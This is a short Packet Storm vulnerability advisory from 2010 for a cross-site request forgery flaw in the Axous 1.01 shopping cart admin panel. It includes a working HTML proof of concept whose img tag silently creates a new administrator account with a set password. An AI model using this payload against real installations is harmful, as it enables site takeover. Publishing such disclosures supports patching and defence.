Axous version 1.01 suffers from a cross site request forgery vulnerability.
a2bb1ad15a66bd12b253cd1d0cfa3bc63d90a2147ef08c807af4540df7c11b4e<!------------------------------------------------------------------------
# Software................Axous 1.01
# Vulnerability...........Cross-site Request Forgery
# Download................http://www.axous.com/
# Release Date............9/16/2010
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://www.johnleitch.net/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A cross-site request forgery vulnerability in Axous 1.01 can be
# exploited to create a new admin.
#
#
# --PoC-->
<html>
<body>
<img src="http://localhost/axous/admin/administrators_add.php?user_name=new_admin&new_passwd=Password1&new_passwd1=Password1&email=test%40test.com&dosubmit=1&id=&action=addnew" />
</body>
</html>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed